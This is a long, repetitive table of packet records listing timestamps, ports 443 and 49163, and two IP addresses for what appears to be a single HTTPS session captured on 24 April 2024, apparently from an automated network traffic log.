Apr 24, 2024 10:24:11.749562025 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.749577045 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.750761986 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.751223087 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.751241922 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.751291990 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.751302004 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.751351118 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.752249956 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.752269030 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.752305984 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.752315044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.752330065 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.752341986 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.754004955 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.754029036 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.754057884 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.754070044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.754082918 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.754154921 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.755847931 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.755875111 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.755903006 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.755912066 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.755925894 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.757962942 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.758071899 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.758097887 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.758119106 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.758125067 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.758141041 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.758183002 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.759383917 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.759407997 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.759432077 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.759438992 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.759453058 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.759474993 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.759970903 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.759994030 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.760014057 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.760020018 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.760032892 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.760077953 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.762017965 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.762038946 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.762062073 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.762072086 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.762089014 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.763495922 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.763523102 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.763556957 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.763566017 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.763581038 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.764478922 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.764502048 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.764529943 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.764539957 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.764554977 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.765726089 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.765749931 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.765782118 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.765790939 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.765805960 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.767489910 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.767508984 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.767545938 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.767558098 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.767573118 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.768482924 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.768507004 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.768532991 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.768543005 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.768558025 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.769953966 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.769972086 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.769999027 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.770009041 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.770024061 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.770754099 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.770849943 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.770869017 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.770893097 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.770898104 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.770911932 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.771560907 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.771630049 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.771852016 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.771869898 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.771907091 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.771913052 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.771927118 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.773010969 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.773031950 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.773066044 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.773075104 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.773089886 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.773104906 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.773792982 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.773812056 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.773838997 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.773847103 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.773866892 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.773899078 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.775300026 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.775320053 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.775352001 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.775360107 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.775374889 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.776814938 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.776839972 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.776881933 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.776890993 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.776906967 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.777242899 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.777261972 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.777295113 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.777301073 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.777322054 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.778053045 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.778080940 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.778104067 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.778111935 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.778126955 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.778146029 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.779932022 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.779952049 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.779978037 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.779989958 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.780004025 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.780086994 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.780591965 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.780610085 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.780646086 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.780653000 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.780673027 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.780723095 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.781613111 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.781630039 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.781658888 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.781667948 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.781682014 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.783653975 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.783679008 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.783704996 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.783715010 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.783729076 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.784636021 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.784651995 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.784684896 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.784693956 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.784707069 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.784718037 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.785336971 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.785357952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.785392046 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.785399914 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.785414934 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.785480976 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.785936117 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.785952091 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.785984993 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.785993099 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.786011934 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.786672115 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.786694050 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.786719084 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.786726952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.786741018 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.787491083 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.787508011 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.787547112 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.787554026 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.787568092 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.787708998 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.788506985 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.788523912 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.788559914 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.788568020 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.788583040 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.789431095 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.789452076 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.789473057 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.789482117 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.789495945 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.790539026 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.790555954 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.790595055 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.790602922 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.790616989 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.791487932 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.791508913 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.791536093 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.791544914 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.791558981 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.792473078 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.792490005 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.792521954 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.792531013 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.792545080 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.793456078 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.793477058 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.793500900 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.793509007 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.793523073 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.793553114 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.794837952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.794855118 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.794889927 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.794899940 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.794913054 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.795371056 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.795393944 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.795408010 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.795413971 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.795435905 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.795531034 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.796550989 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.796569109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.796592951 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.796602011 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.796617985 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.796617985 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.797390938 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.797410965 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.797437906 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.797450066 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.797461987 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.798389912 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.798407078 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.798432112 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.798440933 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.798456907 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.799247980 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.799268007 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.799288988 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.799298048 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.799312115 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.800223112 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.800241947 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.800272942 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.800282955 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.800297022 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.800327063 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.801215887 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.801237106 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.801265955 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.801274061 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.801286936 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.802074909 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.802098989 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.802122116 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.802129984 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.802144051 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.803066969 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.803086996 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.803121090 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.803131104 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.803145885 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.804785967 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.804809093 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.804828882 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.804837942 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.804853916 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.805238962 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.805258989 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.805288076 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.805294991 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.805314064 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.806087971 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.806111097 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.806147099 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.806155920 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.806185007 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.807384014 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.807411909 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.807429075 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.807437897 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.807462931 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.807586908 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.807934046 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.807955027 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.807992935 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.808001041 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.808017015 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.808953047 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.808978081 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.809005976 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.809015036 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.809030056 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.809175968 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.809830904 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.809854984 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.809892893 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.809899092 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.809912920 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.810933113 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.810952902 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.810977936 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.810988903 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.811001062 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.811793089 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.811809063 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.811840057 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.811849117 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.811863899 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.812772989 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.812793970 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.812823057 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.812836885 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.812849998 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.813640118 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.813657999 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.813685894 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.813694954 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.813709021 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.815438986 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.815462112 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.815490961 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.815500975 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.815515041 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.816036940 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.816056013 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.816087008 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.816095114 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.816128016 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.816705942 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.816729069 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.816746950 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.816755056 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.816777945 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.817354918 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.817389965 CEST	443	49163	172.67.215.45	192.168.2.22
